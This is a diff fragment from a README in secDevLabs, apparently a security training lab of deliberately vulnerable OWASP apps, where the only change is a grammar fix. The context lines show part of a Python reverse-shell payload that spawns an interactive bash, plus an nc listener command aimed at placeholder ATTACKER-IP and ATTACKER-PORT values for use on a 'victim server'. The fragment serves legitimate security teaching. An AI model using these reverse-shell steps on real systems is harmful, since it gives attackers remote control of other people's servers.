globocom/secDevLabs/owasp-top10-2017-apps/a1/sstype/README.md

 p=subprocess.call(["/bin/bash","-i"]);
 ```

-To get receive the reverse shell, we first need to use `nc` in our terminal to listen for any connections coming to our `ATTACKER-IP` and `ATTACKER-PORT` and later execute this Python script on the victim server:
+To receive a reverse shell, we first need to use `nc` in our terminal to listen for any connections coming to our `ATTACKER-IP` and `ATTACKER-PORT` and later execute this Python script on the victim server:

 ```sh
 nc -nlv ATTACKER-PORT